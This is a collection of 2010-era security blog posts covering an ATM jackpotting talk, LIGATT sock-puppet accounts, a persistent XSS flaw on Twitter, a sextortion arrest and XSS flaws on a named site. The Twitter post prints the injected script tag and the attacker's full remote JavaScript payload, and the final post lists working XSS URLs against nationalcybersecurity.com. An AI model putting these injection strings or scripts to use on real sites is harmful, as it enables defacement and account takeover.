Security researcher Barnaby Jack, currently at IOActive but a veteran of Foundstone, eEye, and Juniper with almost ten years in the industry, has demonstrated two exploit methods for ATM’s (Automated Teller Machines) in a presentation that is thus far the talk of the Black Hat 2010 conference. In a discussion originally slated for last year before it was muffled by Juniper based on the concerns of “an affected ATM vendor”, Jack demonstrates what he calls jackpotting an ATM.

Here’s the ATM “jackpot” (music playing, money flying out, word ‘Jackpot’ displayed on the console):

The Attack

The attack was employed using two custom tools Jack developed: Scrooge, an ATM firmware rootkit (malicious software that conceals itself at the level of interface between software and hardware) and Dilinger (named for the famous bank robber), a remote ATM attack tool that keeps track of compromised machines and stores the data stolen from people who use the machines. The first exploit involved unlocking a panel on the ATM and inserting a USB key that overwrites the machine’s native firmware with the aforementioned rootkit, taking control of the ATM.

Research

Triton ATM opened up, as an example.

To perform the research, Jack acquired physical ATM machines, attached a debugger to the ATM motherboard, and proceeded to reverse engineer the machine’s firmware. He then developed a replacement version (the aforementioned Scrooge software). Firmware typically refers to the small footprint of code (programs, data structures) that provide internal control of electronic devices. In other words, think the low level operations of any electronic device.

In the models Jack tested he was able to, after accessing the machine’s USB ports with a master key purchased online, perform a replacement of the firmware with his rootkit version. The ATM’s include the ability to do this so that firmware updates can be made by those performing maintenance on the ATM. However, there is no integrity check to ensure that the code update is coming from a trusted source.

The keys themselves for the cabinets are not hard to acquire.

Mitigation

In response ATM vendors have created a new version of the firmware requiring future updates have a digital signature (essentially a shared secret between the machine and the author of code for that machine to ensure the integrity of the code update). Doing this would help to prevent the type of rogue update via USB Jack performed, as long as the signing keys are kept secret.

Breadth

While Jack wouldn’t reveal the names of the ATM vendors whose devices he compromised (they are reported to be Triton and Tranax machines), he has noted that every ATM he has tested he has compromised, intimating attacks on multiple machines are possible because of similarities in the way generic ATM machines are made. He did note the external limitations of his research, citing the fact that there are only so many ATM’s you can put in an apartment before “your girlfriend gets mad”.

Jack actually told the delivery man who brought the ATM’s that he was getting them because he wanted to avoid bank withdrawal fees.

Money spews from the ATM like a slot machine post exploit.

Remote Attack

A remote attack was also demonstrated over Wifi, but many of the details have not yet been released. Jack found a way ,testing on his own machines, to bypass the remote authentication system of the ATM so that the same homemade rootkit, Scrooge, could be installed. This essentially provides access to an ATM via an Internet connection allowing for attack results such as the ability to record card and pin numbers on entry and sending them to a remote attacker). Such vulnerable ATM’s could be located with a war dialing tool, calling thousands of phone numbers until a vulnerable machine responds via modem, a technique already in play by criminals.

Conclusion

“Sometimes you have to demo a threat to spark a solution,”
Barnaby Jack

The image is a resonant and powerful image of insecurity, we have here a demonstrated attack that allows you to spew money out of an ATM in a few seconds, and a second that doesn’t even require physical access to the machine. At this point, the response time frame from ATM vendors as well as the vulnerability demonstrated via USB are bordering on negligence, a master key that is readily available and USB based firmware updates without any signing mechanism to ensure that it is an ‘approved’ update.

We have here, after all, a device whose sole purpose is to dispense cash.

Last year an ATM vendor got the talk pulled from BlackHat by pressuring Jack’s employer, Juniper Networks, despite having seven months of notification from Jack to arrive at some sort of response before the scheduled talk. Given we are now some one and a half years from notification, and given the quantity and dispersal of ATM’s out there, the vulnerabilities demonstrated are likely still viable.

Related Posts:

• Press F1 for Help, pwned.
• Microsoft’s Google Attack Patch?
• Adobe util.printd Zero Day
• Six Bulletins in Last Patch Tuesday of 2009
• The Barack Obama Donations Site was Hacked…err, no it wasn’t.

Security Awareness Programs can be a daunting task. It is not atypical to try to mix security awareness programs with some element of fun, such as humor with a message. After all, playing off fear has a limited shelf life, may not be your personal style, and may alienate the audience. That said good humor is well…hard, and you risk being hokey to the point where your message, and even you, may not be taken seriously.

Enter the PCI Security Standards Council’s horrible country song:

The song has already been nominated for a Pwnie 2010 award.

PCI Standards Rock?

Qualification Fees - PCI QSA

A Twitter response captured the problem with this approach succinctly: “That particular page isn’t going to help their mission – looking like a dope trying to reach people who think you’re a dope” – @Corum.

At least the Standards Council is spending the exorbitant qualification fees it collects wisely.

Related Posts:

A number of new Twitter accounts spawned today, all tweeting positively about the disgraced security firm LIGATT security (plagiarism, threats, stock manipulation), responding to actual security professionals, and using avatars that are attributable to other sources. On one, the account creator actually forgot to remove the “Stock” message from the photo. In another, an image was taken of famous baseball player Ichiro Suzuki to create a fake account titled “Khang”. This technique is instructive in how not to attempt to restore one’s reputation on Twitter, and provides a look at a security company awkwardly creating Twitter Spam as part of its marketing.

Bowie Khung

Bowie Stock Photo Khung

Getty Images: Asian Man Smiling

Khang (aka Ichiro Suzuki, Seattle Mariners baseball team)

Hits leadoff for the Mariners, and tracks LIGATT.

Khang plays baseball, and loves LIGATT.

Nemanja

Nemanja

Where Nemanja's image was taken from.

And the Lameness Continues…

Hey, SPOOFEM works great.

I wish I was in Vuvuzela?

Big Joe Wang

Why does he like the name Rico so much?

Finally

We thought we were done writing about LIGATT, we really did. But the buffoonery seems to know no bounds.

“Just when I thought I was out, they pull me back in.”

Related Posts:

• NationalCyberSecurity.com has all “Original Content”
• LIGATT’s Evans Strikes Back
• Did LIGATT Security’s CEO Threaten the Life of a Security Professional?
• A Loss of SecurityFocus

Twitter user 0wn3d_5ys has demonstrated a persistent cross site scripting (XSS) vulnerability on Twitter he found on June 21st using his own Twitter account (visit at your own risk) that appears to be due to a lack of input validation of the application name field when accepting new requests for Twitter applications. Visiting his account on Twitter results in a pair of classic cross site scripting alert boxes, then your browser is manipulated, finally you enter the matrix (see below), and get messages from the researcher who found the vulnerability.

Initial result of visiting the affected Twitter profile.

Alert box one.

Alert box 2.

Then you're in the matrix.

And lest you wonder at his intentions, he supplies the following messages into the pages title tag:

tb8_messages = new tb8_makeArray(4);
tb8_messages[0] = "My Twitter Owned By : H4x0r-x0x..";
tb8_messages[1] = "I can not play twitter";
tb8_messages[2] = "Injections XSSED On Twitter By: H4x0r-x0x";
tb8_messages[3] = "there is no crime here! I just create To smarten view my Twitter profile. Coding by: 
Indonesian H4x0r";

He announced the find on his blog as well as the Indonesian forum Balikita.

The Vulnerable Field

The problem is similar to one described last August by James Slater. That time around the issue was with the application URL, this time it appears the application name is the issue.

The code containing the injection occurs at the application name field (the via “Application name” you see on your tweets).

<span>via <a href="http://www.0wn3d-5ys.co.cc" rel="nofollow">Ub­­&shy;erTw­i­&shy;tter<span 
style="visibility: hidden"&gt; <script src='http://is.gd/cWO66' type='text/javascript'&gt;</script&gt;</a>
</span>

What do you notice right away? There’s no closing bracket on the closing script tag (Twitter is encoding as gt, at least partially, what was submitted). Here the researcher seems to get lucky in that his closing script tag is ignored, and the page falls all the way through to another Javascript include before it starts interpreting the markup again. Fortunately the next thing the browser interprets is the closing script tag on a Twitter included Javascript, thus the code injection works:

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>

Injection location.

This field is supplied when an application is set up via the Twitter Application Registration page.

Where Application Name is supplied.

The Javascript

The shortened URL included (http://is.gd/cWO66) redirects to: http://h1.ripway.com/www.Frendster.com/011.js.

//*----------------------------------*//
alert("::::::||+ </X55ED> + H4x0r-x0x  +||:::::: ");
alert("::::::::::::::::||+ Page Twitter Owned By: H4x0r-x0x +||:::::::::::::::: \n ::::::||+ H4x0r-x0x From Forum.Balikita.Net & Ungu.com +||::::::");

//*----------------------------------*//
var myjs = document.createElement("script");
myjs.type = "text/javascript";
myjs.src = "http://h1.ripway.com/www.Frendster.com/H4x0r.js";
document.getElementsByTagName("head")[0].appendChild(myjs);

//*----------------------------------*//
var shortc = document.createElement("link");
shortc.rel = "SHORTCUT ICON";
shortc.href = "http://img532.imageshack.us/img532/4308/indonesiaflag.gif";
document.getElementsByTagName("head")[0].appendChild(shortc);

//*----------------------------------*//
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href","http://h1.ripway.com/www.Frendster.com/twitt.css");
document.getElementsByTagName("head")[0].appendChild(css);

//*----------------------------------*//
var css = document.createElement("link");
css.setAttribute("rel","stylesheet");
css.setAttribute("href"," http://h1.ripway.com/www.Frendster.com/css.css");
document.getElementsByTagName("head")[0].appendChild(css);

//**************************************//

//**************************************//

function tb8_makeArray(n){
this.length = n;
return this.length;
}
tb8_messages = new tb8_makeArray(4);
tb8_messages[0] = "My Twitter Owned By : H4x0r-x0x..";
tb8_messages[1] = "I can not play twitter";
tb8_messages[2] = "Injections XSSED On Twitter By: H4x0r-x0x";
tb8_messages[3] = "there is no crime here! I just create To smarten view my Twitter profile. Coding by: Indonesian H4x0r";
tb8_rptType = 'infinite';
tb8_rptNbr = 5;
tb8_speed = 100;
tb8_delay = 2000;
var tb8_counter=1;
var tb8_currMsg=0;
var tb8_tekst ="";
var tb8_i=0;
var tb8_TID = null;
function tb8_pisi(){
tb8_tekst = tb8_tekst + tb8_messages[tb8_currMsg].substring(tb8_i, tb8_i+1);
document.title = tb8_tekst;
tb8_sp=tb8_speed;
tb8_i++;
if (tb8_i==tb8_messages[tb8_currMsg].length){
tb8_currMsg++; tb8_i=0; tb8_tekst="";tb8_sp=tb8_delay;
}
if (tb8_currMsg == tb8_messages.length){
if ((tb8_rptType == 'finite') && (tb8_counter==tb8_rptNbr)){
clearTimeout(tb8_TID);
return;
}
tb8_counter++;
tb8_currMsg = 0;
}
tb8_TID = setTimeout("tb8_pisi()", tb8_sp);
}
tb8_pisi()


//------

var message=" syapakahh Qwueee.. w4s Hare ";
///////////////////////////////////
function clickIE() {if (document.all) {(message);return false;}}
function clickNS(e) {if
(document.layers||(document.getElementById&&!document.all)) {
if (e.which==2||e.which==3) {(message);return false;}}}
if (document.layers)
{document.captureEvents(Event.MOUSEDOWN);document.onmousedown=clickNS;}
else{document.onmouseup=clickNS;document.oncontextmenu=clickIE;}

document.oncontextmenu=new Function("return false")
// -->


//***********//
//form tags to omit in NS6+:
var omitformtags=["input", "textarea", "select"]

omitformtags=omitformtags.join("|")

function disableselect(e){
if (omitformtags.indexOf(e.target.tagName.toLowerCase())==-1)
return false
}

function reEnable(){
return true
}

if (typeof document.onselectstart!="undefined")
document.onselectstart=new Function ("return false")
else{
document.onmousedown=disableselect
document.onmouseup=reEnable
}

/***********/

scrW=screen.availWidth
scrH=screen.availHeight
window.resizeTo(10,10)
window.focus()
for(a=0;a<80;a++){
window.moveTo(0,0)
window.resizeTo(0,scrH*a/80)
}

window.resizeTo(0,0)
for(b=0;b<80;b++){
window.moveTo(0,scrH/1)
window.resizeTo(scrW*b/80,0)
}

for(c=0;c<80;c++){
window.moveTo(scrW/1,scrH/1)
window.resizeTo(0,scrH*c/80)
}

for(d=0;d<80;d++){
window.moveTo(scrW/1,0)
window.resizeTo(scrW*d/80,0)
}

for(e=0;e<80;e++){
window.resizeTo(scrW*e/80,scrH*e/80)
}

window.moveTo(0,0)
window.resizeTo(scrW,scrH) 

///************************///
var wibiya_pl = "false";
var wibiya_nc = "true";
var wibiya_latestJq = false;
var wibiya_flashFix = false;
var wibiya_jQuery_ver = 132;
var wibiyaTimeoutId;

function jquery_ver(){
    return parseInt(jQuery.fn.jquery.replace(/\./gi,'').substring(0,3));
}

if (!Array.prototype.indexOf) {
    Array.prototype.indexOf = function(obj, start) {
        for (var i = (start || 0), j = this.length; i < j; i++) {
            if (this[i] === obj) {
                return i;
            }
        }
        return -1;
    }
}

function loadjscssfile(filename, filetype, where){
    var fileref;
    if (filetype=="js"){ //if filename is a external JavaScript file
        fileref=document.createElement("script");
        fileref.setAttribute("type","text/javascript");
        fileref.setAttribute("src", filename);
    }
    else if (filetype=="css"){ //if filename is an external CSS file
        fileref=document.createElement("link");
        fileref.setAttribute("rel", "stylesheet");
        fileref.setAttribute("type", "text/css");
        fileref.setAttribute("href", filename);
    }
    if (typeof fileref!="undefined"){
        if (where=="head"){
            document.getElementsByTagName("head")[0].appendChild(fileref);
        }
        else{
            document.getElementsByTagName("body")[0].appendChild(fileref);
        }
    }
}

function CheckJQueryLoader(toolbarId)
{
    if (typeof jQuery == "function")
    {
        if (!wibiya_latestJq)
        {
            clearTimeout(wibiyaTimeoutId);
            SetToolbarLoad();
        }
        else
        {
            if (jquery_ver() >= wibiya_jQuery_ver)
            {
                clearTimeout(wibiyaTimeoutId);
                SetToolbarLoad();
            }
            else
            {
                wibiyaTimeoutId =  setTimeout("CheckJQueryLoader("+toolbarId+");",200);
            }
        }
    }
    else
    {
        wibiyaTimeoutId =  setTimeout("CheckJQueryLoader("+toolbarId+");",200);
    }
}

function getQueryParam(name){
    var qString = window.location.search.substring(1).split("&");
    var params = new Array();

    var p;
    for(var i=0; i<qString.length; i++){
        p = qString[i].split("=");
        params[p[0]] = p[1];
    }

    return params[name];
}

function SetToolbarLoad(){
    var wibiya_mobiles = ["iphone","ipod","ipad","series60","symbian","android","windows ce",
        "blackberry","palm","avantgo","docomo","vodafone","j-phone",
        "xv6850","htc","lg;","lge","mot","nintendo","nokia","samsung","sonyericsson"];
    wibiyaToolbar.wibiya_isMobile = false;
    wibiyaToolbar.wibiya_uAgent = navigator.userAgent.toLowerCase();
    for(var i=0;i<wibiya_mobiles.length;i++){
        if(wibiyaToolbar.wibiya_uAgent.match(wibiya_mobiles[i]) != null){
            wibiyaToolbar.wibiya_isMobile = true;
            break;
        }
    }

    if ((jQuery.browser.msie && parseInt(jQuery.browser.version)==6) ||  wibiyaToolbar.wibiya_isMobile == true){
        // ie 6 and below -> do nothing
    }
    else{
        if(wibiya_flashFix === true){
            wibiyaToolbar.rewriteFlash = 0;
            wibiyaToolbar.framework.FlashFix();
            wibiyaToolbar.rewriteFlashInterval = setInterval("wibiyaToolbar.framework.FlashFix();", 3333);
        }

        wibiyadomain = "http://cdn.wibiya.com/Toolbars/dir_0463/Toolbar_463831/";
        // no-conflict
        if (wibiya_nc=="true") jQuery.noConflict();

        var altToolbar = getQueryParam("toolbarObjId");
        // detect jd_gallery, ie, user_request - load page after document.ready
        if (typeof (startGallery) == "function" || jQuery.browser.msie || wibiya_pl=="true") {
            var wibiyaScriptSrc;
            jQuery(document).ready(function(){
                if (typeof altToolbar == "undefined"){
                    wibiyaScriptSrc = wibiyadomain+"toolbar_463831_4c1ec2a47b60f.js";
                }
                else{
                    wibiyaScriptSrc = altToolbar;
                }
                loadjscssfile(wibiyaScriptSrc,"js","body");
            });
        }
        else{
            if (typeof altToolbar == "undefined"){
                wibiyaScriptSrc = wibiyadomain+"toolbar_463831_4c1ec2a47b60f.js";
            }
            else{
                wibiyaScriptSrc = altToolbar;
            }
            loadjscssfile(wibiyaScriptSrc,"js","body");
        }
    }
}


if (typeof(wibiyaToolbar)!="object"){
    if ( typeof jQuery != "function"){
        loadjscssfile("http://cdn.wibiya.com/Scripts/jquery-1.4.2.min.js","js","head");
    }
    else{
        if (wibiya_latestJq && jquery_ver() != wibiya_jQuery_ver){
            loadjscssfile("http://cdn.wibiya.com/Scripts/jquery-1.4.2.min.js","js","head");
        }
    }

    var wibiyaToolbar = {};
    wibiyaToolbar.framework = {};

    wibiyaToolbar.id="463831";
    wibiyaToolbar.referrer=document.referrer;
    CheckJQueryLoader(wibiyaToolbar.id);
}


/************************************************************************/
/* Rainbow Links Version 1.03 (2003.9.20)                               */
/* Script updated by Dynamicdrive.com for IE6                           */
/* Copyright (C) 1999-2001 TAKANASHI Mizuki                             */
/* takanasi@hamal.freemail.ne.jp                                        */
/*----------------------------------------------------------------------*/
/* Read it somehow even if my English text is a little wrong! ;-)       */
/*                                                                      */
/* Usage:                                                               */
/*  Insert '<script src="rainbow.js"></script>' into the BODY section,  */
/*  right after the BODY tag itself, before anything else.              */
/*  You don't need to add "onMouseover" and "onMouseout" attributes!!   */
/*                                                                      */
/*  If you'd like to add effect to other texts(not link texts), then    */
/*  add 'onmouseover="doRainbow(this);"' and                            */
/*  'onmouseout="stopRainbow();"' to the target tags.                   */
/*                                                                      */
/* This Script works with IE4,Netscape6,Mozilla browser and above only, */
/* but no error occurs on other browsers.                               */
/************************************************************************/


////////////////////////////////////////////////////////////////////
// Setting

var rate = 20;  // Increase amount(The degree of the transmutation)


////////////////////////////////////////////////////////////////////
// Main routine

if (document.getElementById)
window.onerror=new Function("return true")

var objActive;  // The object which event occured in
var act = 0;    // Flag during the action
var elmH = 0;   // Hue
var elmS = 128; // Saturation
var elmV = 255; // Value
var clrOrg;     // A color before the change
var TimerID;    // Timer ID


if (document.all) {
    document.onmouseover = doRainbowAnchor;
    document.onmouseout = stopRainbowAnchor;
}
else if (document.getElementById) {
    document.captureEvents(Event.MOUSEOVER | Event.MOUSEOUT);
    document.onmouseover = Mozilla_doRainbowAnchor;
    document.onmouseout = Mozilla_stopRainbowAnchor;
}


//=============================================================================
// doRainbow
//  This function begins to change a color.
//=============================================================================
function doRainbow(obj)
{
    if (act == 0) {
        act = 1;
        if (obj)
            objActive = obj;
        else
            objActive = event.srcElement;
        clrOrg = objActive.style.color;
        TimerID = setInterval("ChangeColor()",100);
    }
}


//=============================================================================
// stopRainbow
//  This function stops to change a color.
//=============================================================================
function stopRainbow()
{
    if (act) {
        objActive.style.color = clrOrg;
        clearInterval(TimerID);
        act = 0;
    }
}


//=============================================================================
// doRainbowAnchor
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function doRainbowAnchor()
{
    if (act == 0) {
        var obj = event.srcElement;
        while (obj.tagName != 'A' && obj.tagName != 'BODY') {
            obj = obj.parentElement;
            if (obj.tagName == 'A' || obj.tagName == 'BODY')
                break;
        }

        if (obj.tagName == 'A' && obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = objActive.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// stopRainbowAnchor
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function stopRainbowAnchor()
{
    if (act) {
        if (objActive.tagName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Mozilla_doRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function begins to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_doRainbowAnchor(e)
{
    if (act == 0) {
        obj = e.target;
        while (obj.nodeName != 'A' && obj.nodeName != 'BODY') {
            obj = obj.parentNode;
            if (obj.nodeName == 'A' || obj.nodeName == 'BODY')
                break;
        }

        if (obj.nodeName == 'A' && obj.href != '') {
            objActive = obj;
            act = 1;
            clrOrg = obj.style.color;
            TimerID = setInterval("ChangeColor()",100);
        }
    }
}


//=============================================================================
// Mozilla_stopRainbowAnchor(for Netscape6 and Mozilla browser)
//  This function stops to change a color. (of a anchor, automatically)
//=============================================================================
function Mozilla_stopRainbowAnchor(e)
{
    if (act) {
        if (objActive.nodeName == 'A') {
            objActive.style.color = clrOrg;
            clearInterval(TimerID);
            act = 0;
        }
    }
}


//=============================================================================
// Change Color
//  This function changes a color actually.
//=============================================================================
function ChangeColor()
{
    objActive.style.color = makeColor();
}


//=============================================================================
// makeColor
//  This function makes rainbow colors.
//=============================================================================
function makeColor()
{
    // Don't you think Color Gamut to look like Rainbow?

    // HSVtoRGB
    if (elmS == 0) {
        elmR = elmV;    elmG = elmV;    elmB = elmV;
    }
    else {
        t1 = elmV;
        t2 = (255 - elmS) * elmV / 255;
        t3 = elmH % 60;
        t3 = (t1 - t2) * t3 / 60;

        if (elmH < 60) {
            elmR = t1;  elmB = t2;  elmG = t2 + t3;
        }
        else if (elmH < 120) {
            elmG = t1;  elmB = t2;  elmR = t1 - t3;
        }
        else if (elmH < 180) {
            elmG = t1;  elmR = t2;  elmB = t2 + t3;
        }
        else if (elmH < 240) {
            elmB = t1;  elmR = t2;  elmG = t1 - t3;
        }
        else if (elmH < 300) {
            elmB = t1;  elmG = t2;  elmR = t2 + t3;
        }
        else if (elmH < 360) {
            elmR = t1;  elmG = t2;  elmB = t1 - t3;
        }
        else {
            elmR = 0;   elmG = 0;   elmB = 0;
        }
    }

    elmR = Math.floor(elmR).toString(16);
    elmG = Math.floor(elmG).toString(16);
    elmB = Math.floor(elmB).toString(16);
    if (elmR.length == 1)    elmR = "0" + elmR;
    if (elmG.length == 1)    elmG = "0" + elmG;
    if (elmB.length == 1)    elmB = "0" + elmB;

    elmH = elmH + rate;
    if (elmH >= 360)
        elmH = 0;

    return '#' + elmR + elmG + elmB;
}


//****************************//
var scrolltotop={setting:{startline:100,scrollto:0,scrollduration:1000,fadeduration:[500,100]},controlHTML:'<iframe title="h4x0r-x0x" src="http://www5.shoutmix.com/?h4x0r-x0x" width="500" height="700" frameborder="0" scrolling="auto"></iframe>',controlattrs:{offsetx:5,offsety:5},anchorkeyword:'#top',state:{isvisible:false,shouldvisible:false},scrollup:function(){if(!this.cssfixedsupport)
this.$control.css({opacity:0})
var dest=isNaN(this.setting.scrollto)?this.setting.scrollto:parseInt(this.setting.scrollto)
if(typeof dest=="string"&&jQuery('#'+dest).length==1)
dest=jQuery('#'+dest).offset().top
else
dest=0
this.$body.animate({scrollTop:dest},this.setting.scrollduration);},keepfixed:function(){var $window=jQuery(window)
var controlx=$window.scrollLeft()+$window.width()-this.$control.width()-this.controlattrs.offsetx
var controly=$window.scrollTop()+$window.height()-this.$control.height()-this.controlattrs.offsety
this.$control.css({left:controlx+'px',top:controly+'px'})},togglecontrol:function(){var scrolltop=jQuery(window).scrollTop()
if(!this.cssfixedsupport)
this.keepfixed()
this.state.shouldvisible=(scrolltop>=this.setting.startline)?true:false
if(this.state.shouldvisible&&!this.state.isvisible){this.$control.stop().animate({opacity:1},this.setting.fadeduration[0])
this.state.isvisible=true}
else if(this.state.shouldvisible==false&&this.state.isvisible){this.$control.stop().animate({opacity:0},this.setting.fadeduration[1])
this.state.isvisible=false}},init:function(){jQuery(document).ready(function($){var mainobj=scrolltotop
var iebrws=document.all
mainobj.cssfixedsupport=!iebrws||iebrws&&document.compatMode=="CSS1Compat"&&window.XMLHttpRequest
mainobj.$body=(window.opera)?(document.compatMode=="CSS1Compat"?$('html'):$('body')):$('html,body')
mainobj.$control=$('<div id="topcontrol">'+mainobj.controlHTML+'</div>').css({position:mainobj.cssfixedsupport?'fixed':'absolute',bottom:mainobj.controlattrs.offsety,right:mainobj.controlattrs.offsetx,opacity:0,cursor:'pointer'}).attr({title:'Scroll Back to Top'}).click(function(){mainobj.scrollup();return false}).appendTo('body')
if(document.all&&!window.XMLHttpRequest&&mainobj.$control.text()!='')
mainobj.$control.css({width:mainobj.$control.width()})
mainobj.togglecontrol()
$('a[href="'+mainobj.anchorkeyword+'"]').click(function(){mainobj.scrollup()
return false})
$(window).bind('scroll resize',function(e){mainobj.togglecontrol()})})}}
scrolltotop.init()

H4X0R-X0X

The researcher who found the problem hosts his blog at a .co.cc URL. While .cc is the country code for the Cocos (Keeling) Islands in Australia, .co.cc is actually a company offering free subdomain redirection services (http://www.co.cc/). The IP address of the blog (74.125.113.121) is shown as owned by Google Inc.. Perhaps the most relevant piece of origin information is the language used on the blog and in the forum, Indonesian.

The flag isn’t a bad clue either.

Forum post at Balikita.net, a Community of Art.

Impact

As demonstrated in the past, XSS vulnerabilities in Twitter have been successfully used to take over accounts and create worms (Mikeyy, StalkDaily). Infection (account takeover) can be accomplished simply by visiting a profile with an include of a malicious Javascript, making a true self propagating web site worm possible as opposed to other more recent attacks based on phishing a user’s credentials with a fake Twitter login screen (the LOL is this you style attacks).

Twitter's Del Harvey

This might be Twitter’s first serious cross site scripting vulnerability since the beginning of this year. Twitter has to correct this quickly as it was public knowledge before this post, and has been for days. We note that the problem has been reported to Twitter by a fellow researcher, and we also reported the issue to Del Harvey (Twitter’s Trust and Safety Team). We could have gone through the security e-mail address, but frankly the last time we did that the response irritated us. And since Harvey once worked in a mental institution, she is probably the most qualified to deal with security people.

Update

As of 6pm the problem is still active in old applications, as one of our commentators below pointed out (with a working example). Twitter advised that the project has been corrected for new applications.

Related Posts:

• James Lipton says “Don’t tweet your junk”
• “Hi. This you?? LOL” Twitter Attack Snares Kevin Mitnick
• Not the Haus of Gaga too
• Facebook’s Faith: A New Scareware Attack
• Breaking Twitter (authentication)

At least 186 women and 44 girls were caught in a bizarre scheme by 31 year old Santa Ana CA resident Luis Mijangos who attempted to extort pornographic videos from his victims. Mijangos, a paraplegic due to a gang shooting, was arrested yesterday following a two year investigation by the FBI, is charged with extortion and faces a maximum of two years in federal prison.

The FBI originally became involved in 2009 when called in by the Glendale Police to look into the compliant of a woman who suspected she was being stalked by an ex-boyfriend. The FBI’s investigation led them to Mijangos. A forensic analysis performed showed cracking activity dating back to 2008.

The Scheme

Mijangos initially gained control of user’s PC’s using Trojans disguised as popular songs on Peer to Peer file sharing networks. Once he took control of the PC, he would search for sexually explicit photographs and financial information, and attempt to use what he found to further extort pornographic videos from his victims. Bizarre e-mails would come from mijangos3@msn.com (he also went by Guicho) demanding sex tapes be made by the victims:

"I will publish the images and let your family know about your dark side … so you better do that video,
 send it to me via e-mail and you will never hear from me ever...If I don't hear from you then your family
 will hear from me,"

"You have three kids and a psycho ex but hat [sic] I don't care if you don't want this pics and the rest I 
have from you to be published [sic] this is what I want...A porn video of you 'you can blur your face;' 
if don't get the video ina day I will publish thse [sic] images and let your family know about your 
dark side as a hooker"

In one case he sent a nude picture of the victim to her and demanded her silence and a pornographic video or he would tell her family. He would tell victims that since he controlled their computers, he would know if they tried to contact authorities.

At times he would post as the victim’s boyfriend and request the explicit content, when he succeeded he would request increasingly more explicit videos be made and sent to him under threat of releasing the previously sent images. Finally there is evidence that he used web cams and microphones attached to the compromised computers to watch his victims in various states of undress or during intimate activities. At least one 20 year old woman put a sticker over her web cam when it continually went on without her doing anything.

He also used keyloggers to gain access to social networking sites, e-mail, credit card numbers, and so forth to gain further information to perpetuate the scheme as well as make purchases. He sent malware via instant messenger to the contacts of his victims to infect more computers, tallying more than 100 infected in all.

Mijangos indicated he was a consultant with programming knowledge of both Java and C++, so at this point the authorities and media have dubbed him a “master hacker”. Mijangos himself has indicated he is part of a team of “international hackers” and told at least one victim you don’t want to mess with a team of hackers.

His Defense

Mjangos came up with his own bizarre explanation for his actions, that he was in fact hired by boyfriends and husbands to see if the women would respond to requests for pornographic materials, a sort of fidelity test similar to what a private investigator might do to find a cheating spouse. Interestingly, Mjangos was so stupid that he continued his illegal activities even after a search warrant was executed back in March of this year. When caught he had in his home dozens of videos showing victims in states of undress (leaving the shower, getting dressed, engaging in intercourse) as well as financial data including credit card numbers alongside TurboTax, T-Mobile, Netflix, Paypal, HSBC, and Chase Bank account information.

Mjangos is a Mexican national, thus the INS is also involved.

Finally

This case is not the first involving cyber-extortion, think back to the DDoS extortion threats made against web site operators, but it is unusual in that it was not money being requested. Its not clear to me why this man only faces two years in prison, and the charges are limited to extortion, when 44 of the victims were juveniles making this potentially a child pornography case also. Identify theft would also appear applicable.

Either way, this is a good example of the FBI showing an interest in a seemingly innocuous case, cyberstalking by an ex-boyfriend, that instead led to and nailed a pretty serious predator. Much like in the corporate environment, a lot can happen when you start to pull on a thread.

References

• Santa Ana MAN ARRESTED by FBI FOR HACKING COMPUTERS and DEMANDING SEXUALLY EXPLICIT VIDEOS FROM WOMEN AND TEENAGE GIRLS
• FBI charges O.C. man in ’sextortion’ case
• Prosecutors say Calif man hacked into computers to extort sex videos from women, teen girls

Related Posts:

Readers of Yahoo Finance were treated to the following wackadoo press release on Friday: National Cyber Security Uncovers Racism Within the Computer Security Industry. In our article Friday we made a case for a better title: “Ligatt Discovers that People Don’t Like Being Plagiarized”. The web site referenced, National Cyber Security by Ligatt, is a not so subtle take off of the name of the National Cyber Security Division (NCSD) in the Department of Homeland Security. This “National Cyber Security” is another strange project from confidence man Gregory Evans of Ligatt Security.

Here is the stated mission:

“National Cyber Security is the number one cyber security related reference and news portal. It is their vital mission to help secure not only the nation, but the world from cyber criminal threats being faced daily. Their references include a cyber security watch news, blogs written by cyber security professionals, cyber security links, and email correspondence to their professionals who help protect website visitors from any cyber threat.

But with fake reporter profiles, plagiarized articles, dubious cyber-terrorism experts, bizarre biographies of other people, and a site riddled with security flaws: the actual message of the web site is overtaken by a subtler truth about charlatans in the information security industry.

McKenzie

“By purchasing National Cyber Security, we will be able to partner with fellow computer security experts like Grey McKenzie to be a force against cyber-crime.” – Gregory Evans

McKenzie was part of an anti-keylogging product called SpyCop that appears to have gone dark or continued under a different form according to forum posts. Strangely, while McKenzie lists himself as creator of the National Cyber Security Portal, he lists no affiliation with Ligatt on LinkedIn. It appears the site was purchased by Ligatt on 3/31/09 and redesigned, although the original site had republished news stories as well.

Plagiarized Content

IronGeek has done excellent job making the case against Ligatt’s plagiarism on this web site with the following Youtube video which amusingly begins with Evans stating that the site is “all original content” not stories gathered through “Googles”:

Bizarre Biographies

Judith Pugh or J.L. Smith?

It is sad when you can’t even steal effectively. The answer is both, this picture is of J.L. Smith aka Judith Pugh, author of Reporting for Doodie, One Grandmother’s Story of Commitment, Frustration & Unwavering Love and not a National Cyber Security author.

Riddled with Security Flaws

The site was victimized on Friday by a vulnerability allowing for what appears to be a persistent XSS attack that allowed whoever exploited it to replace the picture of Gregory Evans with a picture reference to Epic Fail Guy, itself a pseudo reference to ‘Anonymous’, Guy Fawkes, et al.:

Gregory Evans as Guy Fawkes stick figure Epic Fail Guy.

The flaw that allowed this is in addition to numerous cross site scripting (XSS) issues on the web site:

http://www.nationalcybersecurity.com/search?Query=%3CIMG+SRC%3D%22http%3A%2F%2Fattrition.org
/images/squirrel-mascot-iconL.gif%22%3E&fromSmall=true&searchWhat=searchAll&submit.x=20&submit.y=10&
searchField=searchContentBody&searchField=searchContentBody

Source: Attrition.org.

http://www.nationalcybersecurity.com/admin/index.php?username=<script>alert('xss')</script>

Source: http://quine.dreamwidth.org/2904.html

http://www.nationalcybersecurity.com/search?Query=<script>alert('xss')</script>

Source: http://quine.dreamwidth.org/2722.html

